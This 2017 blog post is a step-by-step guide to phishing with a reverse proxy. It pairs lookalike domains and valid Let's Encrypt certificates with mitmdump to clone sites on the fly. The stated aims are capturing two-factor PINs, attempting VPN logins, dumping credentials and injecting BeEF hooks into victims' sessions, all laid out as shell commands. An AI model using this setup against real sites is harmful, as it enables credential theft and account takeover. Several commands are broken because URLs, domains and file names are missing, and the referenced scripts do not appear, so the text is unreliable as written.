Thursday, March 30, 2017

Reverse proxy phishing with valid certificates


This is going to be a quick down and dirty post on how to effectively create cloned websites on the fly by using mitmdump and letsencrypt for valid certificates. We'll use a reverse proxy in front of a site in order to create very convincing and advanced phishing campaign. This is a great way to capture two factor authentication pins and attempt automatic VPN logins.

Acquire a domain

There are plenty of different approaches when it comes to acquiring a domain for your phish. Ideally, you will want it to be very similar to your target. Alternative TLDs are an easy way to make convincing phishing attacks. You may also look into recently expired domains that can be acquired. For this tutorial, I'm going to set up instead of purchasing a domain for demonstration sake, and demonstrate a phish by setting up a reverse proxy for

CatMyFish is an excellent tool that relies on in order to find potential expired domains.

Lets Encrypt!

Let's encrypt is a free, automated, and open CA that's available to anyone that owns a domain or subdomain. They have done a lot of work in helping to create secure connections for millions of websites. While they provide a great and legitimate service, it's often abused by criminals and red teams as well. Certbot is a cross platform tool for validating that you do indeed own a domain prior to issuing any certificates.

Download certbot

$ wget
$ chmod a+x certbot-auto
$ ./certbot-auto

Now simply run the following command, and choose "Spin up a temporary webserver (standalone)"

$ ./certbot-auto certonly

Follow the prompts for your e-mail address and domain as appropriate. Your certificates will be placed in /etc/letsencrypt/live/ In order to prepare the certificates for use with out reverse proxy MITM attack, simply concatenate the private key and fullchain certificates into one file.

$ sudo cat /etc/letsencrypt/live/ /etc/letsencrypt/live/ >

Download latest mitmproxy

Mitmproxy recently went through some large upgrade that may not have made it into your distribution's repository list yet. We'll go ahead and grab 0.18.2 using pip, as some features regarding the certificates seem to be broken in 2.* versions.

$ sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
$ sudo pip3 install mitmproxy==0.18.2

Execute reverse proxy attack

$ sudo mitmdump -R -p 443 --no-upstream-cert --cert blog.chokepoint.pem -w blog.log
Notice how the URL bar has the green Secure logo and all.

Going Beyond

Here are two scripts that will help in dumping credentials as well as an example script for injecting BEEF hooks into sessions passing through the MITM.

Dumping credentials

Beef injection

Running scripts

In order to execute scripts, use the -s option in mitmdump. For example:
$ sudo mitmdump -R -p 443 --no-upstream-cert --cert blog.chokepoint.pem -s ./ -w blog.log
$ sudo mitmdump -R -p 443 --no-upstream-cert --cert blog.chokepoint.pem -w blog.log -s ""